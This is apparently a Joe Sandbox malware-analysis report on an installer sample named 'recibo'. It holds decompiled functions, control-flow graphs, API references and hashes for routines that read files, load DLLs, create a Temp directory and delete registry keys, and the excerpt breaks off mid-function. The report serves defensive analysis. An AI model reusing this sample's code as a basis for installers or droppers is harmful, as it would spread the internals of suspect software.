                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll
                                                                                  • API String ID: 1495540970-2536265409
                                                                                  • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                  • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                  • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                  • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 870 4026ec-402705 call 402d84 873 402c2a-402c2d 870->873 874 40270b-402712 870->874 877 402c33-402c39 873->877 875 402714 874->875 876 402717-40271a 874->876 875->876 878 402720-40272f call 40649d 876->878 879 40287e-402886 876->879 878->879 883 402735 878->883 879->873 884 40273b-40273f 883->884 885 4027d4-4027d7 884->885 886 402745-402760 ReadFile 884->886 888 4027d9-4027dc 885->888 889 4027ef-4027ff call 4060b0 885->889 886->879 887 402766-40276b 886->887 887->879 891 402771-40277f 887->891 888->889 892 4027de-4027e9 call 40610e 888->892 889->879 897 402801 889->897 894 402785-402797 MultiByteToWideChar 891->894 895 40283a-402846 call 406484 891->895 892->879 892->889 894->897 898 402799-40279c 894->898 895->877 901 402804-402807 897->901 902 40279e-4027a9 898->902 901->895 904 402809-40280e 901->904 902->901 905 4027ab-4027d0 SetFilePointer MultiByteToWideChar 902->905 906 402810-402815 904->906 907 40284b-40284f 904->907 905->902 908 4027d2 905->908 906->907 909 402817-40282a 906->909 910 402851-402855 907->910 911 40286c-402878 SetFilePointer 907->911 908->897 909->879 912 40282c-402832 909->912 913 402857-40285b 910->913 914 40285d-40286a 910->914 911->879 912->884 915 402838 912->915 913->911 913->914 914->879 915->879
                                                                                  C-Code - Quality: 87%
                                                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                  				intOrPtr _t65;
                                                                                  				intOrPtr _t66;
                                                                                  				intOrPtr _t72;
                                                                                  				void* _t76;
                                                                                  				void* _t79;
                                                                                  
                                                                                  				_t72 = __edx;
                                                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                  				_t65 = 2;
                                                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                  				_t66 = E00402D84(_t65);
                                                                                  				_t79 = _t66 - 1;
                                                                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                  				if(_t79 < 0) {
                                                                                  					L36:
                                                                                  					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                                  				} else {
                                                                                  					__ecx = 0x3ff;
                                                                                  					if(__eax > 0x3ff) {
                                                                                  						 *(__ebp - 0x44) = 0x3ff;
                                                                                  					}
                                                                                  					if( *__edi == __bx) {
                                                                                  						L34:
                                                                                  						__ecx =  *(__ebp - 0xc);
                                                                                  						__eax =  *(__ebp - 8);
                                                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                  						if(_t79 == 0) {
                                                                                  							 *(_t76 - 4) = 1;
                                                                                  						}
                                                                                  						goto L36;
                                                                                  					} else {
                                                                                  						 *(__ebp - 0x38) = __ebx;
                                                                                  						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                                  						if( *(__ebp - 0x44) > __ebx) {
                                                                                  							do {
                                                                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                  										__eax = __ebp - 0x50;
                                                                                  										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                  											goto L34;
                                                                                  										} else {
                                                                                  											goto L21;
                                                                                  										}
                                                                                  									} else {
                                                                                  										goto L34;
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eax = __ebp - 0x40;
                                                                                  									_push(__ebx);
                                                                                  									_push(__ebp - 0x40);
                                                                                  									__eax = 2;
                                                                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                                                  									if(__eax == 0) {
                                                                                  										goto L34;
                                                                                  									} else {
                                                                                  										__ecx =  *(__ebp - 0x40);
                                                                                  										if(__ecx == __ebx) {
                                                                                  											goto L34;
                                                                                  										} else {
                                                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                  											 *(__ebp - 0x4c) = __ecx;
                                                                                  											 *(__ebp - 0x50) = __eax;
                                                                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                  												L28:
                                                                                  												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                  											} else {
                                                                                  												__ebp - 0x50 = __ebp + 0xa;
                                                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                  													L21:
                                                                                  													__eax =  *(__ebp - 0x50);
                                                                                  												} else {
                                                                                  													__edi =  *(__ebp - 0x4c);
                                                                                  													__edi =  ~( *(__ebp - 0x4c));
                                                                                  													while(1) {
                                                                                  														_t22 = __ebp - 0x40;
                                                                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                  														__eax = 0xfffd;
                                                                                  														 *(__ebp - 0x50) = 0xfffd;
                                                                                  														if( *_t22 == 0) {
                                                                                  															goto L22;
                                                                                  														}
                                                                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                  														__edi = __edi + 1;
                                                                                  														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                                                  														__ebp - 0x50 = __ebp + 0xa;
                                                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                  															continue;
                                                                                  														} else {
                                                                                  															goto L21;
                                                                                  														}
                                                                                  														goto L22;
                                                                                  													}
                                                                                  												}
                                                                                  												L22:
                                                                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                  													goto L28;
                                                                                  												} else {
                                                                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                  														} else {
                                                                                  															__ecx =  *(__ebp - 0xc);
                                                                                  															__edx =  *(__ebp - 8);
                                                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													} else {
                                                                                  														__ecx =  *(__ebp - 0xc);
                                                                                  														__edx =  *(__ebp - 8);
                                                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                  														 *(__ebp - 0x38) = __eax;
                                                                                  														if(__ax == __bx) {
                                                                                  															goto L34;
                                                                                  														} else {
                                                                                  															goto L26;
                                                                                  														}
                                                                                  													}
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L37;
                                                                                  								L26:
                                                                                  								__eax =  *(__ebp - 8);
                                                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  				}
                                                                                  				L37:
                                                                                  				return 0;
                                                                                  			}








                                                                                  0x004027a6
                                                                                  0x004027a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004027ab
                                                                                  0x004027ae
                                                                                  0x004027b6
                                                                                  0x004027c2
                                                                                  0x004027d0
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d0
                                                                                  0x0040279e
                                                                                  0x00402804
                                                                                  0x00402807
                                                                                  0x00000000
                                                                                  0x00402809
                                                                                  0x0040280e
                                                                                  0x0040284f
                                                                                  0x00402871
                                                                                  0x00402878
                                                                                  0x0040285d
                                                                                  0x0040285d
                                                                                  0x00402860
                                                                                  0x00402863
                                                                                  0x00402866
                                                                                  0x00402866
                                                                                  0x00000000
                                                                                  0x00402817
                                                                                  0x00402817
                                                                                  0x0040281a
                                                                                  0x0040281d
                                                                                  0x00402823
                                                                                  0x00402827
                                                                                  0x0040282a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040282a
                                                                                  0x0040280e
                                                                                  0x00402807
                                                                                  0x0040277f
                                                                                  0x0040276b
                                                                                  0x00402760
                                                                                  0x00000000
                                                                                  0x0040282c
                                                                                  0x0040282c
                                                                                  0x0040282f
                                                                                  0x00402838
                                                                                  0x00000000
                                                                                  0x0040272f
                                                                                  0x0040271a
                                                                                  0x00402c33
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                    • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                  • String ID: 9
                                                                                  • API String ID: 163830602-2366072709
                                                                                  • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                  • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                  • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                  • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 916 40689a-4068ba GetSystemDirectoryW 917 4068bc 916->917 918 4068be-4068c0 916->918 917->918 919 4068d1-4068d3 918->919 920 4068c2-4068cb 918->920 922 4068d4-406907 wsprintfW LoadLibraryExW 919->922 920->919 921 4068cd-4068cf 920->921 921->922
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040689A(intOrPtr _a4) {
                                                                                  				short _v576;
                                                                                  				signed int _t13;
                                                                                  				struct HINSTANCE__* _t17;
                                                                                  				signed int _t19;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                  				if(_t13 > 0x104) {
                                                                                  					_t13 = 0;
                                                                                  				}
                                                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                  					_t19 = 1;
                                                                                  				} else {
                                                                                  					_t19 = 0;
                                                                                  				}
                                                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                  				return _t17;
                                                                                  			}









                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                  • wsprintfW.USER32 ref: 004068EC
                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                  • API String ID: 2200240437-1946221925
                                                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                  • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                  • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1082 405a6e-405ab9 CreateDirectoryW 1083 405abb-405abd 1082->1083 1084 405abf-405acc GetLastError 1082->1084 1085 405ae6-405ae8 1083->1085 1084->1085 1086 405ace-405ae2 SetFileSecurityW 1084->1086 1086->1083 1087 405ae4 GetLastError 1086->1087 1087->1085
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405A6E(WCHAR* _a4) {
                                                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                                                  				int _t22;
                                                                                  				long _t23;
                                                                                  
                                                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                  				_v36.Owner = 0x4083f8;
                                                                                  				_v36.Group = 0x4083f8;
                                                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                                                  				_v36.Revision = 1;
                                                                                  				_v36.Control = 4;
                                                                                  				_v36.Dacl = 0x4083e8;
                                                                                  				_v16.nLength = 0xc;
                                                                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                  				if(_t22 != 0) {
                                                                                  					L1:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t23 = GetLastError();
                                                                                  				if(_t23 == 0xb7) {
                                                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                  						goto L1;
                                                                                  					}
                                                                                  					return GetLastError();
                                                                                  				}
                                                                                  				return _t23;
                                                                                  			}








                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                  • GetLastError.KERNEL32 ref: 00405AC5
                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                  • GetLastError.KERNEL32 ref: 00405AE4
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 3449924974-3355392842
                                                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                  • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                  • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1088 402ea9-402ed2 call 4063aa 1090 402ed7-402edb 1088->1090 1091 402ee1-402ee5 1090->1091 1092 402f8c-402f90 1090->1092 1093 402ee7-402f08 RegEnumValueW 1091->1093 1094 402f0a-402f1d 1091->1094 1093->1094 1095 402f71-402f7f RegCloseKey 1093->1095 1096 402f46-402f4d RegEnumKeyW 1094->1096 1095->1092 1097 402f1f-402f21 1096->1097 1098 402f4f-402f61 RegCloseKey call 40690a 1096->1098 1097->1095 1099 402f23-402f37 call 402ea9 1097->1099 1103 402f81-402f87 1098->1103 1104 402f63-402f6f RegDeleteKeyW 1098->1104 1099->1098 1106 402f39-402f45 1099->1106 1103->1092 1104->1092 1106->1096
                                                                                  C-Code - Quality: 48%
                                                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                  				void* _v8;
                                                                                  				int _v12;
                                                                                  				short _v536;
                                                                                  				void* _t27;
                                                                                  				signed int _t33;
                                                                                  				intOrPtr* _t35;
                                                                                  				signed int _t45;
                                                                                  				signed int _t46;
                                                                                  				signed int _t47;
                                                                                  
                                                                                  				_t46 = _a12;
                                                                                  				_t47 = _t46 & 0x00000300;
                                                                                  				_t45 = _t46 & 0x00000001;
                                                                                  				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                  				if(_t27 == 0) {
                                                                                  					if((_a12 & 0x00000002) == 0) {
                                                                                  						L3:
                                                                                  						_push(0x105);
                                                                                  						_push( &_v536);
                                                                                  						_push(0);
                                                                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                  							__eflags = _t45;
                                                                                  							if(__eflags != 0) {
                                                                                  								L10:
                                                                                  								RegCloseKey(_v8);
                                                                                  								return 0x3eb;
                                                                                  							}
                                                                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                  							__eflags = _t33;
                                                                                  							if(_t33 != 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_push(0x105);
                                                                                  							_push( &_v536);
                                                                                  							_push(_t45);
                                                                                  						}
                                                                                  						RegCloseKey(_v8);
                                                                                  						_t35 = E0040690A(3);
                                                                                  						if(_t35 != 0) {
                                                                                  							return  *_t35(_a4, _a8, _t47, 0);
                                                                                  						}
                                                                                  						return RegDeleteKeyW(_a4, _a8);
                                                                                  					}
                                                                                  					_v12 = 0;
                                                                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                  						goto L10;
                                                                                  					}
                                                                                  					goto L3;
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}













                                                                                  APIs
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 1354259210-0
                                                                                  • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                  • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                  • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                  • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1107 71541817-71541856 call 71541bff 1111 71541976-71541978 1107->1111 1112 7154185c-71541860 1107->1112 1113 71541862-71541868 call 7154243e 1112->1113 1114 71541869-71541876 call 71542480 1112->1114 1113->1114 1119 715418a6-715418ad 1114->1119 1120 71541878-7154187d 1114->1120 1121 715418cd-715418d1 1119->1121 1122 715418af-715418cb call 71542655 call 71541654 call 71541312 GlobalFree 1119->1122 1123 7154187f-71541880 1120->1123 1124 71541898-7154189b 1120->1124 1125 715418d3-7154191c call 71541666 call 71542655 1121->1125 1126 7154191e-71541924 call 71542655 1121->1126 1148 71541925-71541929 1122->1148 1129 71541882-71541883 1123->1129 1130 71541888-71541889 call 71542b98 1123->1130 1124->1119 1127 7154189d-7154189e call 71542e23 1124->1127 1125->1148 1126->1148 1141 715418a3 1127->1141 1136 71541885-71541886 1129->1136 1137 71541890-71541896 call 71542810 1129->1137 1138 7154188e 1130->1138 1136->1119 1136->1130 1147 715418a5 1137->1147 1138->1141 1141->1147 1147->1119 1151 71541966-7154196d 1148->1151 1152 7154192b-71541939 call 71542618 1148->1152 1151->1111 1154 7154196f-71541970 GlobalFree 1151->1154 1157 71541951-71541958 1152->1157 1158 7154193b-7154193e 1152->1158 1154->1111 1157->1151 1160 7154195a-71541965 call 715415dd 1157->1160 1158->1157 1159 71541940-71541948 1158->1159 1159->1157 1161 7154194a-7154194b FreeLibrary 1159->1161 1160->1151 1161->1157
                                                                                  C-Code - Quality: 88%
                                                                                  			E71541817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                  				void _v36;
                                                                                  				char _v136;
                                                                                  				struct HINSTANCE__* _t37;
                                                                                  				void* _t39;
                                                                                  				intOrPtr _t42;
                                                                                  				void* _t48;
                                                                                  				void* _t49;
                                                                                  				void* _t50;
                                                                                  				void* _t54;
                                                                                  				intOrPtr _t57;
                                                                                  				signed int _t61;
                                                                                  				signed int _t63;
                                                                                  				void* _t67;
                                                                                  				void* _t68;
                                                                                  				void* _t72;
                                                                                  				void* _t76;
                                                                                  
                                                                                  				_t76 = __esi;
                                                                                  				_t68 = __edi;
                                                                                  				_t67 = __edx;
                                                                                  				 *0x7154506c = _a8;
                                                                                  				 *0x71545070 = _a16;
                                                                                  				 *0x71545074 = _a12;
                                                                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x71545048, E71541651);
                                                                                  				_push(1); // executed
                                                                                  				_t37 = E71541BFF(); // executed
                                                                                  				_t54 = _t37;
                                                                                  				if(_t54 == 0) {
                                                                                  					L28:
                                                                                  					return _t37;
                                                                                  				} else {
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                  						E7154243E(_t54);
                                                                                  					}
                                                                                  					_push(_t54);
                                                                                  					E71542480(_t67);
                                                                                  					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                  					if(_t57 == 0xffffffff) {
                                                                                  						L14:
                                                                                  						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                  							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                  								_push(_t54);
                                                                                  								_t37 = E71542655();
                                                                                  							} else {
                                                                                  								_push(_t76);
                                                                                  								_push(_t68);
                                                                                  								_t61 = 8;
                                                                                  								_t13 = _t54 + 0x1018; // 0x1018
                                                                                  								memcpy( &_v36, _t13, _t61 << 2);
                                                                                  								_t42 = E71541666(_t54,  &_v136);
                                                                                  								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                  								_t18 = _t54 + 0x1018; // 0x1018
                                                                                  								_t72 = _t18;
                                                                                  								_push(_t54);
                                                                                  								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                  								 *_t72 = 4;
                                                                                  								E71542655();
                                                                                  								_t63 = 8;
                                                                                  								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_push(_t54);
                                                                                  							E71542655();
                                                                                  							_t37 = GlobalFree(E71541312(E71541654(_t54)));
                                                                                  						}
                                                                                  						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                  							_t37 = E71542618(_t54);
                                                                                  							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                  								_t37 =  *(_t54 + 0x1008);
                                                                                  								if(_t37 != 0) {
                                                                                  									_t37 = FreeLibrary(_t37);
                                                                                  								}
                                                                                  							}
                                                                                  							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                  								_t37 = E715415DD( *0x71545068);
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                  							goto L28;
                                                                                  						} else {
                                                                                  							_t39 = GlobalFree(_t54); // executed
